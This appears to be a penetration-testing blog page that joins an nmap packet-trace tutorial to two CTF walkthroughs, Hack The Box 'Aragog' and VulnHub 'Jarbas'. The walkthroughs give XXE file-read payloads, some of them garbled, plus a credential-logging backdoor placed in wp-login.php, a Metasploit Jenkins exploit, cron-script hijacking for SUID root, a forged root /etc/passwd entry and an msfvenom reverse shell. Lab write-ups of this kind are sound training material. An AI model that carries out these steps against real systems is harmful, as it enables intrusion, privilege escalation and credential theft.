Understanding NMAP packet trace

Hello friends!! Today we are going to discussed how to capture network packet using nmap. And used wireshark for comparing its result from nmap. In this article we mainly focused on what types of network traffic is captured by nmap while we use various nmap ping scan.

Ping scan in nmap is done to check if the target host is alive or not. As we know that ping by default sends the ICMP echo request and gets an ICMP echo reply if the system is alive. Ping scan by default send an ARP packet and gets a response to check if the host is up.

NOTE: Nmap scans changes their behavior according to the network they are scanning.

·         Scanning Local Network with Nmap where nmap sends an ARP packet with every scan.

·         If an external network is to be scanned; nmap sends the following request packets:

ICMP echo request

ICMP timestamp request

TCP SYN to port 443

TCP ACK to port 80

Technique Involves in packet-tracing via nmap

The nmap module is an interface with nmap's internal functions and data structures. The API offers target host information such as port states and version detection results. It also provides an interface to the Nsock library for effective network I/O.

Nsock is a parallel sockets library used by NSE, service detection (service_scan.cc) and DNS (nmap_dns.cc). It acts as an abstraction layer above socket operations and is optimized for handling multiple sockets. mspool is defined at nsock_internal.h and contains among other things a struct event_lists which is a structure that keeps information on all pending events.

Event creation

Events are represented with the msevent struct (nsock_internal.h) which contains (among other things)

§  The callback handler -> nsock_ev_handler (nsock_pool, nsock_event, void *)

§  A pointer to a msiod struct -> msiod *iod, which holds all the I/O descriptor (IOD) related information.

§  Struct filespace iobuf (a buffer usually 1024 bytes which holds the write/read bytes)

§  The nse_type (nsock.h)

§  The nse_status (nsock.h)

§  A unique id -> nsock_event_id (EID)

Events are created with the the following special functions:

nsock_connect.c

·         nsock_connect_tcp

·         nsock_connect_udp

·         nsock_connect_ssl

·         nsock_reconnect_ssl

nsock_read.c

·         nsock_readlines

·         nsock_readbytes

·         nsock_read

nsock_write.c

·         nsock_write

·         nsock_printf

nsock_timer_create.c

·         nsock_timer_create

source: https://sock-raw.org/nmap-ncrack/nsock.html

Let’s Start!!

Nmap Sweep Ping Analysis

Attribute -sn/ -sP are used for sweep ping and they try to identify the live host in the network. Using --packet-trace along nmap scan we can observe the network packet.

nmap -sn 192.168.1.103 --packet-trace

Here you can observe first two packets SENT/RECD (received) showing ARP request packet from 192.168.1.105 to 192.168.1.103 and then used NSOCK libraries to state actual request and response packets travel between the source and destination router.

§  NSOCK INFO that denotes a new nsock_event_id (EID) 8 is generated to represents I/O descriptor (IOD) #1 for NSOCK UDP connection request to the router on port 53.

§  NSOCK INFO that denotes another (EID) 18 is generated to represents read request from (IOD) #1. 

§  NSOCK INFO that denotes another (EID) 27 is generated to represents write request for 44 bytes to (IOD) #1.

§  NSOCK INFO that denotes SUCCESSFUL operation when nsock used callback_handler to connect for EID 8.

§  NSOCK INFO that denotes SUCCESSFUL operation when nsock used callback_handler to write for EID 27.

§  NSOCK INFO that denotes SUCCESSFUL operation when nsock used callback_handler to read for EID 18.

§  NSOCK info that IOD #1 is deleted.

§  NSOCK info that nevent_delete is deleting on event 34.

At last Nmap scan report Host is up.

You can observe the the same traffic we have captured from wireshark

§  Arp request packet for 192.168.1.105 to 192.168.1.103

§  Arp reply packet from 192.168.1.103 to 192.168.1.105

Similar you can also choose --reason option with nmap command to enumerate response from host network.

nmap -sn 192.168.1.103 --reason

As you can observe it has clearly shown Host is up, when received arp-response.

As we have seen, by default Nmap sent ARP packet to identify host status therefore now we will trace nmap packet when --disable-arp-ping is activated.

nmap -sn 192.168.1.103 --packet-trace --disable-arp-ping

Here you can notice the following SENT packets from source 192.168.1.105 to destination 192.168.1.103.

§  ICMP echo request

§  ICMP timestamp request

§  TCP SYN to port 443

§  TCP ACK to port 80

Then RCVD packet ICMP Echo-reply from destination 192.168.1.103 and then used NSOCK libraries to state actual request and response packets travel between source to the destination router.

Demonstrating working of Ping Sweep using wireshark

From given below image you can observe the following packet of request and reply between both network IP.

1.       ICMP echo request

2.       TCP SYN to port 443

3.       TCP ACK to port 80

4.       ICMP timestamp request

5.       ICMP echo reply

6.       TCP RST, ACK to port 443

7.       TCP RST to port 80

8.       ICMP timestamp Reply

 

nmap -sn 192.168.1.103 --disable-arp-ping --reason

Similar you can also choose --reason option with nmap command to enumerate response from host network.

nmap -sn 192.168.1.103 --disable-arp-ping --reason

As you can observe it has clearly shown Host is up, when received ICMP echo-response.

Nmap TCP-SYN Ping Analysis

Attribute -PS sends TCP SYN packet on port 80 by default; we can change it by specifying the ports with it, like: -P22.

nmap -PS -p22 192.168.1.103 --packet-trace

Here you can observe this scan is addition of nmap ping scan and nmap stealth scan because in the beginning it sends arp packet then uses nsock libraries and at the end again implicates TCP half communication.

So you can observe the following information we fetched from nmap:

§  SENT/RECD ARP request and reply respectively.

§  Nsock libraries details

§  TCP-SYN packet from 192.168.1.105:36088 to 192.168.1.103:22.

§  TCP-SYN/ACK packet from 192.168.1.103:22 to 192.168.1.105:36088.

 

 

Similarly we saw the same pattern of network traffic in wireshark.

 

Similar you can also choose --reason option with nmap command to enumerate response from host network.

nmap -PS -p22 192.168.1.103 --reason

Here you can observe port 22 is open and when received SYN/ACK packet from host.

Now let figure out network traffic when --disable-arp-ping activated.

nmap -PS -p22 192.168.1.103 --packet-trace --disable-arp-ping

So you can observe the following information we fetched from nmap:

§  SENT TCP-SYN packet on port 80

§  RCVD TCP-RST/ACK from port 80.

§  Nsock libraries details

§  TCP-SYN packet from 192.168.1.105:63581 to 192.168.1.103:22.

TCP-SYN/ACK packet from 192.168.1.103:22 to 192.168.1.105:63851.

 

Similarly we saw the same pattern of network traffic in wireshark also.

 

Nmap ICMP Ping Analysis

Attribute –PE sends ICMP echo request packet [ICMP type 8] and received ICMP echo reply packet

nmap -PS -PE 192.168.1.103 --packet-trace --disable-arp-ping

Here you can notice ICMP Echo-request packets SENT from source 192.168.1.105 to destination 192.168.1.103

Then RCVD packet ICMP Echo-reply from destination 192.168.1.103 and then used NSOCK libraries to state actual request and response packets travel between source to destination router.

Similarly we saw the same pattern of network traffic in wireshark also.  

Nmap Stealth Scan Analysis

Let’s capture the network packet for default nmap scan also called stealth scan which follow TCP half communication

nmap -p22 192.168.1.103

 

Here you can observe TCP-half communication:

§  TCP-SYN packet sent from source 192.168.1.105 to 192.168.1.103 on port 22.

§  TCP-SYN, ACK packet received from source 192.168.1.103 to 192.168.1.105.

§  TCP-RST packet sent from source 192.168.1.105 to 192.168.1.103.

   Now let’s verify it with parameter --packet-trace and compare the result.

   nmap -p22 192.168.1.103 --packet-trace  

   So you can observe the following information we fetched from nmap which is similar as TCP-SYN Ping.

§  SENT/RECD ARP request and reply respectively.

§  Nsock libraries details

§  TCP-SYN packet from 192.168.1.105:48236 to 192.168.1.103:22.

§  TCP-SYN/ACK packet from 192.168.1.103:22 to 192.168.1.105:48236.

Similar you can also choose --reason option with nmap command to enumerate response from host network.

nmap -p22 192.168.1.103 --reason

Here you can observe port 22 is open and when received SYN/ACK packet from host.

Now let figure out network traffic when --disable-arp-ping activated.

nmap -p22 192.168.1.103 --packet-trace --disable-arp-ping

Here you can notice the following SENT packets from source 192.168.1.105 to destination 192.168.1.103.

§  SENT ICMP echo request

§  SENT TCP SYN to port 443

§  SENT TCP ACK to port 80

§  SENT ICMP timestamp request

§  Then RCVD packet ICMP Echo-reply from destination 192.168.1.103

§  Then used NSOCK libraries to state actual request and response packets travel between sources to destination router.

§  SENT TCP-SYN request on port 22

§  RECV TCP-SYN, ACK reply from port 22.

 

 

Similarly we saw the same pattern of network traffic in wireshark also.

Nmap TCP Scan Analysis

As we knew TCP scan is follow full tcp communication and it is known as three-way-handshake.

nmap -sT -p22 192.168.1.103 --packet-trace

So you can observe the following information we fetched from nmap which is similar as TCP-SYN Ping.

SENT/RECD ARP request and reply respectively.

Nsock libraries details

Connecting TCP Localhost from destination host 192.168.1.103:22 is in progress.

Connected TCP Localhost from destination host 192.168.1.103:22 successfully.

 

Similarly we saw the same pattern of network traffic in wireshark also.

Similar you can also choose --reason option with nmap command to enumerate response from host network.

nmap -sT -p22 192.168.1.103 --reason

Here you can observe port 22 is open and when received SYN/ACK packet from host.

 

Hack the Box: Aragog Walkthrough

Hello Friends!! Today we are going to solve another CTF Challenge “Aragog”. This VM is also developed by Hack the Box, Aragog is a Retired Lab and there are multiple ways to breach into this VM.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

As these labs are only available online, therefore, they have a static IP. Aragog Lab has IP: 10.10.10.78.

Now, as always let’s begin our hacking with the port enumeration.

nmap -A 10.10.10.78

Looking around its result we found ports 21, 22 and 80 are open. Moreover we notice FTP anonymous login is allowed.

So we try to connect with FTP through anonymous login. Here I found text.txt file in current directory. Then with the help of get command we downloaded text.txt file in our local machine.

ftp 10.10.10.78

ls

get test.txt

Inside test.txt file we observe something related to a subnet_mask in xml format, at this point I was confused where I can implement this hint.

Then we open target IP over web browser but didn’t found any remarkable thing here.

When we found nothing at port 80, then though to use dirbuster for web directory brute-force attack.

Here I found a /host.php file from its result.

When I have explored /host.php in the web browser I found a message “There are 4294967294 possible hosts for” as shown below image. So I search in Goggle for 4294967294 host which was related to 255.255.255.254 as found in above test.txt file.

It mean we can post test.txt file here with help of burpsuit.

So let’s capture the request and sent the intercepted data into repeater.

As we have predict the test.txt is in XML format so we have tried to validate XXE injection.

    &xxe;

   

Luckily we found this is vulnerable to XXE injection.

Hence now I can simply exploit it for fetching /etc/passwd file with help of following XXE script and then check its response.

 

]>

    &xxe;

   

Great!! We got the /passwd file successfully and enumerated two local usernames.

With the help of /passwd file information we try to get id_rsa through XXE script.

 

]>

    &xxe;

   

Yuppiee! We got the ssh private key successfully, that I copied in text file and named as key.

Then assign permission 600 to saved key (id-rsa) and then try to connect with SSH as we knew the port 22 was open in the victim’s network.

cd Desktop

chmod 600 key

ssh -i key florian@10.10.10.78

And as you can observe that we get login successfully and accessed the TTY shell of victim’s machine, now let’s find the user.txt file to finish the 1^st task.

cd /home

ls

cd /florian

ls

cat user.txt

1^st task is completed; let’s find out root.txt to finish the 2^nd task.

Inside /var/www/html we saw /dev_wiki and it was good to see that this folder holds wordpress setup and configuration files.

So I simply add host IP: 10.10.10.78 and host name: aragog is our local host file which is present inside /etc.

So we explore aragog/dev_wiki in our web browser and got Worpress home page.

As you can observe inside /blog we found a message to Florian from Cliff where he had express the mess of wordpress restoring in very few minutes.

So with help of Google I found a script pspy32s and download it in victim’s VM inside /tmp and also gave execution permission.

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

cd /tmp

wget http://10.10.14.6/ pspy32s

chmod +x pspy32s

After particular time we realize that there is a cronjob that is frequently deleting the dev_wiki folder & replacing it with the backup folder & a script wp-login.py is ran shortly after that process occurs.

Now let’s manipulate the content of wp-login.php file and place a new php code inside it to enumerate username and password.

echo “” > wp-login.php

nano wp-login.php

$req_dump = print_r($_REQUEST, TRUE);

$fp = fopen('/tmp/request.log', 'a');

fwrite($fp, $req_dump);

fclose($fp);

?>

cat wp-login.php

So this file will dump the credential after few minutes inside /tmp.

cd /tmp

cat creds.txt

Administrator: !KRgYs(JFO!&MTr)lf

Hmm!!! We got the admin credential.

Now let’s grab the root.txt file quickly and finish this task.

su root

cd /root

cat root.txt

We finished both tasks successfully!!

Hack the Jarbas: 1 (CTF Challenge)

Hello readers. We’d recently tried our hands on the vulnerable VM called Jarbas on vulnhub. It is developed to look like a 90s Portuguese search engine. It is made by Tiago Tavares. You can download the lab from here. The objective of this challenge is to get root shell.

Difficulty Level: Easy

Steps involved:

Method 1:

1.       Port scanning and network discovery.

2.       Directory enumeration.

3.       Discovery of usernames and password hashes.

4.       Cracking password hash.

5.       Exploiting Jenkins on port 8080 using metasploit.

6.       Discovering cronjob.

7.       Modifying cronjob and replacing it with a custom command to set sticky bit on find.

8.       Waiting 5 minutes for the sticky bit to get set.

9.       Executing root command to read flag.

Method 2:

1.       Exploiting Jenkins as above to get shell.

2.       Using openssl to create a password hash.

3.       Editing /etc/passwd file with our custom file.

4.       Uploading it in /tmp folder.

5.       Copying it in place of /etc/passwd.

6.       Logging in as root using su binary.

Method 3:

1.       Achieving meterpreter as above.

2.       Uploading a reverse_bash one liner in CleaningScript.sh.

3.       Activating Netcat and getting root.

     

Let’s get started then.

Method 1:

After running a netdiscover scan we figured out that the IP that DHCP allotted to the VM was 192.168.1.122 in my case.

So, we used nmap aggressive scan to discover opened ports on the VM.

nmap –A 192.168.1.122

There was a webpage associated with the VM so we opened it in browser.

When nothing seemed to impress us, we tried to enumerate the directories using directory buster.

Since, index.html is the default page and there was another HTML page available, we tried to open it in browser.

We found some password hashes in the access.html that we tried to crack it online on hashkiller.

WOW! We have three passwords in hand now.

Now, remember we had port 22 open in our nmap scan report, so we tried to login into ssh using the usernames and passwords we just cracked but it didn’t seem to work. So, we looked at another interesting port 8080 and opened it in browser.

We found a web application on Jenkins. It is an open source automation server written in Java. Jenkins helps to automate the non-human part of the software development process, with continuous integration and facilitating technical aspects of continuous delivery.

We tried to login with all three of the usernames and passwords but the third combination logged us into Jenkins which was:

eder: vipsu

Now, we found that Jenkins had a script console vulnerability and its module was in metasploit.

use exploit/multi/http/jenkins_script_console

msf exploit(jenkins_script_console) > set target 1

msf exploit(jenkins_script_console) > set rhost 192.168.1.122

msf exploit(jenkins_script_console) > set rport 8080

msf exploit(jenkins_script_console) > set USERNAME eder

msf exploit(jenkins_script_console) > set PASSWORD vipsu

msf exploit(jenkins_script_console) > exploit

We got a meterpreter session! Let’s try and get a teletype here using python’s one liner shell:

shell

python –c ‘import pty;pty.spawn(“/bin/bash”);’

Now, we found a shell script in the crontab which was executing automatically after every 5 minutes called CleaningScript.sh and whose job was to remove access log from the system.

cat /etc/crontab

cd /etc/script

ls

cat CleaningScript.sh

But even better, it was running with root permissions!

Let’s make a new gedit file called CleaningScript.sh and use the root privilege of CleaningScript.sh file to set a sticky bit on “find.”

#!/bin/bash

chmod u+s /usr/bin/find

Now, all that was left to do was to upload this new shell script onto the server and replace it with the original file.

So, we background the shell (CTRL+Z)

and use meterpreter upload command.

upload /root/Desktop/CleaningScript.sh .

shell

python –c ‘import pty;pty.spawn(“/bin/bash”);’

date

We observed the time and waited for exactly 5 minutes for the script to run automatically.

After 5 mintes:

ls –la /usr/bin/find

Permissions modified: -rwsr-xr-x

Sticky bit got set! Now we just need to use the find inline command execution:

find /home –exec whoami \;

As you can see all the users got enumerated as root.

find /home –exec ls –la /root \;

Hence, we can execute any command as root now!!

A file called flag.txt was visible in the root directory.

find /home –exec cat flag.txt \;

Method 2:

For this method, we achieve the meterpreter session as above and then get a shell.

We used echo command this time to set sticky bit on /usr/bin/cp

echo “chmod u+s /usr/bin/cp” > CleaningScript.sh

We read the /etc/passwd file using cat utility after that.

Our aim was to add a user in /etc/passwd file as root. So, we use openssl utility to create a password hash with the command:

openssl passwd –l –salt user3 pass123

Copy the password hash in someplace safe now.

Copy the /etc/passwd file in a leafpad file and let’s add our custom user in there.

raj:$1$user3$:0:0:root:/root:/bin/bash

Save this file somewhere on desktop and download this file on server’s /tmp (universal writeable) directory.

Then use cp (since, we set sticky bit) to copy and replace this file with the original file with the command:

cp passwd /etc/passwd

Let’s try and login using su binary:

su raj

[password]: pass123

Voila! We got a root shell! Let’s read the flag now.

cd /root

ls

cat flag.txt

Method 3:

Achieve shell as above and in another terminal window, try this msfvenom command:

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.133 lport=4444

Since, we know CleaningScript.sh is run as root in every 5 minutes, so we copy this one liner in CleaningScript.sh and activate a netcat shell side by side and wait for 5 minutes.

cd /etc/script

ls

echo "0<&126 >&126 2>&126" > CleaningScript.sh

In other window, after waiting for 5 minutes, we will get a root shell!

nc -lvp 4444

id

python  -c 'import pty;pty.spawn("/bin/bash");'

cat flag.txt

So, that’s how we captured the flag in this VM. Happy Hacking.